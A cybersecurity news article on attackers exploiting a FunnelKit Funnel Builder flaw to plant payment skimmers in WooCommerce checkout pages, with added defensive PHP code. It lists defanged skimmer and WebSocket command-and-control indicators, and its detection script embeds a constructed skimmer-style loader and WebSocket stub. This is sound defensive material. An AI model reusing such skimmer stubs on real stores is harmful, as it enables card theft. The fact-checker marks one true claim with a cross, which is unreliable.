FunnelKit Vulnerability Under Active Exploitation Puts 40,000 WooCommerce Stores at Risk

A Critical WooCommerce Plugin Flaw Is Fueling Silent Payment Theft

A dangerous security vulnerability affecting thousands of WooCommerce stores has triggered a major cybersecurity alarm across the ecommerce industry. Attackers are actively exploiting a flaw in the popular Funnel Builder plugin by FunnelKit, silently injecting malicious payment skimming code into online checkout pages. The campaign is already underway, and security researchers warn that more than 40,000 online storefronts may be exposed.

What makes this attack particularly alarming is its stealth. The malicious scripts are cleverly disguised as legitimate analytics or marketing tools, making them extremely difficult for store owners to detect during routine inspections. Customers continue shopping normally while their sensitive payment details are secretly harvested in the background.

The vulnerability affects all Funnel Builder plugin versions prior to 3.15.0.3. According to researchers at Sansec, the flaw allows unauthenticated attackers to remotely inject arbitrary JavaScript into checkout pages without needing administrative access. This creates a direct pathway for cybercriminals to deploy persistent payment skimmers capable of stealing credit card information from unsuspecting buyers.

The root of the issue lies in a publicly accessible checkout endpoint built into the Funnel Builder plugin. This endpoint was designed to process incoming requests and execute internal plugin methods. However, older versions failed to properly verify user permissions or restrict which internal functions could be called remotely.

Because of these missing authorization checks, attackers can directly invoke a sensitive internal method responsible for modifying the plugin’s global settings. One of those settings, labeled “External Scripts,” automatically inserts custom JavaScript code into every checkout page across the website.

Cybercriminals quickly realized they could abuse this functionality to implant malicious scripts that persist across the entire ecommerce store. Once injected, the skimmer silently monitors customer activity during checkout and captures payment information in real time.

Researchers discovered that attackers are disguising their payloads as fake Google Tag Manager or analytics scripts. To administrators reviewing the site configuration, the malicious code appears harmless and blends naturally beside legitimate tracking tools already present on the store.

Behind the scenes, however, these scripts load sophisticated payment skimmers from attacker-controlled infrastructure. The malware establishes hidden communication channels using WebSocket connections, allowing attackers to exfiltrate stolen payment data without immediately triggering suspicion.

Security analysts identified multiple indicators of compromise connected to the campaign. One malicious script source was linked to the domain:

analytics-reports[.]com/wss/jquery-lib.js

Researchers also observed communication with the following command-and-control endpoint:

wss://protect-wss[.]com/ws

The domains have been intentionally defanged to prevent accidental interaction or execution.

FunnelKit has since released a patched version of the plugin addressing the vulnerability. The update introduces strict capability checks and restricts access to only approved internal methods, effectively closing the exploit path abused by attackers.
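As an added example (not FunnelKit's code and not the actual patch), here is how a WordPress AJAX dispatcher of the kind described above is hardened along the lines the fix is reported to take: an explicit allowlist of callable methods, a capability check for anything that writes settings, and a nonce. All class, function and option names are assumed.

```php
<?php
// Added example, not FunnelKit's code. A hypothetical WordPress AJAX
// dispatcher hardened the way the article describes the fix: an explicit
// allowlist of callable methods plus capability and nonce checks. Every
// name below (MyFunnelSettings, myfunnel_*) is an assumption.

class MyFunnelSettings {
    // Read-only data that anonymous checkout visitors may legitimately need.
    public function get_checkout_steps( array $args ): array {
        return (array) get_option( 'myfunnel_steps', array() );
    }
    // Writes plugin settings, including any option that injects page scripts.
    public function update_global_settings( array $args ): bool {
        return update_option( 'myfunnel_settings', $args );
    }
}

// Methods reachable without login: read-only, no side effects.
const MYFUNNEL_PUBLIC_METHODS = array( 'get_checkout_steps' );
// Methods that change state, each mapped to the capability it requires.
// Anything absent from both lists is unreachable over the endpoint.
const MYFUNNEL_ADMIN_METHODS = array( 'update_global_settings' => 'manage_options' );

function myfunnel_dispatch() {
    $method = sanitize_key( wp_unslash( $_POST['method'] ?? '' ) );
    // Per-field sanitization of $args belongs in each method; wp_unslash only here.
    $args   = (array) wp_unslash( $_POST['data'] ?? array() );
    $obj    = new MyFunnelSettings();

    if ( in_array( $method, MYFUNNEL_PUBLIC_METHODS, true ) ) {
        wp_send_json_success( $obj->$method( $args ) ); // sends and exits
    }

    if ( isset( MYFUNNEL_ADMIN_METHODS[ $method ] ) ) {
        // Missing in the vulnerable pattern: who is calling, and did they mean to?
        if ( ! is_user_logged_in() || ! current_user_can( MYFUNNEL_ADMIN_METHODS[ $method ] ) ) {
            wp_send_json_error( 'forbidden', 403 );
        }
        check_ajax_referer( 'myfunnel_settings', 'nonce' ); // dies on failure
        wp_send_json_success( $obj->$method( $args ) );
    }

    // Unknown method: refuse. Never fall through to method_exists() on user input.
    wp_send_json_error( 'unknown method', 400 );
}
add_action( 'wp_ajax_myfunnel_dispatch', 'myfunnel_dispatch' );
add_action( 'wp_ajax_nopriv_myfunnel_dispatch', 'myfunnel_dispatch' );
```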

Store owners are being strongly urged to update immediately to Funnel Builder version 3.15.0.3 or later through the WordPress dashboard. However, patching alone may not fully eliminate the risk if a store has already been compromised before the update was applied.

Security experts recommend manually reviewing the plugin’s “External Scripts” configuration for suspicious entries or unfamiliar JavaScript snippets. Administrators should also perform full malware scans on their ecommerce environments to identify hidden backdoors, rogue administrator accounts, or additional persistence mechanisms left behind by attackers.
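An added, runnable PHP CLI script (not from the article or the plugin) that reviews an exported copy of such a setting the way the paragraph recommends: it flags script sources from hosts the store owner has not approved and inline snippets that open WebSockets or decode/eval code. The approved-host list and the sample HTML are constructed.

```php
<?php
// Added example, not from the article or FunnelKit: an offline review of the
// HTML stored in a plugin's external-scripts setting, run as a CLI script
// against an exported copy. The allowlist and the sample are constructed.

// Hosts this store knowingly loads scripts from (assumption; adapt per store).
$allowed_hosts = array( 'www.googletagmanager.com', 'www.google-analytics.com' );

// Constructed sample: one genuine tag, one disguised loader, one inline stub.
$setting = <<<'HTML'
<!-- Google Tag Manager -->
<script async src="https://www.googletagmanager.com/gtm.js?id=GTM-EXAMPLE"></script>
<script src="https://unlisted-host.example/wss/jquery-lib.js"></script>
<script>var s=new WebSocket("wss://c2.example/ws");s.onopen=function(){};</script>
HTML;

function review_external_scripts( string $html, array $allowed_hosts ): array {
    $findings = array();
    // 1. Script tags with a src: the host decides, not the file name.
    if ( preg_match_all( '/<script\b[^>]*\bsrc=["\']([^"\']+)["\']/i', $html, $m ) ) {
        foreach ( $m[1] as $src ) {
            $host = strtolower( (string) parse_url( $src, PHP_URL_HOST ) );
            if ( '' === $host || in_array( $host, $allowed_hosts, true ) ) {
                continue; // same-origin or approved
            }
            $file = basename( (string) parse_url( $src, PHP_URL_PATH ) );
            $note = preg_match( '/jquery|gtm|analytics|tag/i', $file ) ? ' (library-like name)' : '';
            $findings[] = "unapproved script host $host: $src$note";
        }
    }
    // 2. Inline scripts: WebSocket use and decode/eval are out of place in a tag snippet.
    if ( preg_match_all( '/<script\b(?![^>]*\bsrc=)[^>]*>(.*?)<\/script>/is', $html, $m ) ) {
        foreach ( $m[1] as $body ) {
            $head = substr( trim( $body ), 0, 60 );
            if ( preg_match( '/\bWebSocket\b|wss?:\/\//i', $body ) ) {
                $findings[] = "inline script opens a WebSocket: $head";
            }
            if ( preg_match( '/\b(atob|unescape|eval)\s*\(|\\\\x[0-9a-f]{2}/i', $body ) ) {
                $findings[] = "inline script decodes or evals: $head";
            }
        }
    }
    return $findings;
}

$findings = review_external_scripts( $setting, $allowed_hosts );
echo $findings ? "[!] " . implode( "\n[!] ", $findings ) . "\n" : "no findings\n";
```

To review a live store, replace the embedded sample with the option value exported from the database; the option key is plugin-specific and is not given in the article.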

The incident highlights a growing trend in ecommerce-focused cybercrime, where attackers increasingly target plugins and third-party extensions instead of directly attacking payment gateways themselves. Since plugins often handle sensitive checkout logic, even a single overlooked security weakness can expose thousands of businesses simultaneously.

For many online retailers, the biggest damage may not come from direct financial losses but from the erosion of customer trust. A single payment skimming incident can permanently damage a brand’s reputation, trigger regulatory investigations, and result in chargebacks or legal consequences.

As WooCommerce continues powering millions of ecommerce sites worldwide, plugin security has become one of the most critical elements of modern online business protection. The FunnelKit incident serves as another reminder that even widely trusted plugins can become dangerous attack vectors if security controls are not rigorously enforced.

What Undercode Says:

The FunnelKit compromise demonstrates how modern ecommerce attacks are evolving from noisy intrusions into highly stealthy supply-chain style operations. Instead of breaching servers directly, attackers are now abusing trusted plugins already embedded deeply within checkout infrastructure.

This specific attack is particularly dangerous because it weaponizes legitimate functionality rather than exploiting traditional remote code execution. The “External Scripts” feature was originally intended for marketing integrations and analytics customization. Attackers simply turned that convenience feature into a malware delivery mechanism.

That approach significantly lowers detection rates.

Most administrators expect to see scripts from analytics platforms, ad networks, and tag managers inside checkout pages. Because the malicious payload imitates common marketing code patterns, many security reviews may overlook the infection entirely.

Another major concern is persistence.

Unlike temporary injections that disappear after cache clears or plugin reloads, these skimmers are stored directly inside plugin configuration settings. That means the malicious code survives restarts, theme updates, and in some cases even partial security cleanups.

The vulnerability also highlights a recurring weakness within WordPress ecosystems: insecure AJAX endpoints and missing capability validation. Developers frequently create flexible backend functions for convenience but forget to properly restrict who can execute them.

Attackers actively scan the internet for these exact mistakes.

Once proof-of-concept exploit details become public, mass exploitation typically follows within hours. Automated botnets can compromise thousands of vulnerable ecommerce sites rapidly, especially when plugins are widely installed.

The financial motivation behind payment skimming campaigns is enormous. Stolen credit card data remains one of the most profitable commodities on underground markets. A single compromised store processing hundreds of daily transactions can generate valuable datasets for fraud operations.

This attack also reflects the growing professionalization of cybercrime groups targeting ecommerce environments. The use of WebSocket infrastructure, disguised analytics scripts, and persistent injection methods suggests a mature operation rather than amateur opportunistic hacking.

One overlooked aspect is incident response difficulty.

Even after updating the vulnerable plugin, many businesses may falsely assume they are secure. In reality, attackers may already have planted secondary backdoors elsewhere within the WordPress installation. Without a comprehensive forensic review, infections can remain active for weeks or months.

Another important issue is third-party plugin dependency sprawl.

Many WooCommerce stores rely on dozens of extensions simultaneously. Each additional plugin increases the attack surface dramatically. A single vulnerable extension can undermine the security posture of the entire ecommerce environment.

Organizations should adopt stricter plugin governance policies, including:

Minimizing unnecessary extensions

Removing abandoned plugins

Monitoring plugin update frequency

Conducting regular code audits

Enforcing Web Application Firewall protections

Deploying Content Security Policies where possible

Real-time file integrity monitoring should also become standard practice for ecommerce operators. Detecting unauthorized script injections early can significantly reduce exposure time.

This incident may also increase pressure on WordPress plugin developers to implement secure-by-default coding practices. Features capable of injecting frontend scripts should require stronger validation layers and explicit administrative authorization.

From a broader cybersecurity perspective, the attack reinforces a harsh reality: ecommerce websites are no longer just retail platforms. They are financial infrastructure handling sensitive payment ecosystems, and attackers treat them accordingly.

The most dangerous vulnerabilities today are often the quietest ones.

No ransomware banner appears.

No visible outage occurs.

The store continues operating normally while customer payment information is siphoned silently in the background.

That stealth is precisely what makes these skimming campaigns so effective and so financially devastating.

Fact Checker Results

✅ Funnel Builder by FunnelKit versions prior to 3.15.0.3 were reported as vulnerable to unauthorized script injection attacks.

✅ Security researchers confirmed active exploitation involving fake analytics or Google Tag Manager style scripts used to deploy payment skimmers.

❌ Updating the plugin alone does not guarantee full remediation if attackers already implanted secondary malware or persistence mechanisms before patching.

Prediction

🔮 Ecommerce-focused attacks against WordPress plugins will continue increasing as attackers prioritize scalable targets with direct access to payment flows.

🔮 Future skimming campaigns will likely become even harder to detect by using AI-generated obfuscation and legitimate cloud-hosted infrastructure.

🔮 Security monitoring for WooCommerce environments may soon shift toward behavior-based detection rather than relying only on traditional malware signatures.

References:

Reported By: cyberpress.org
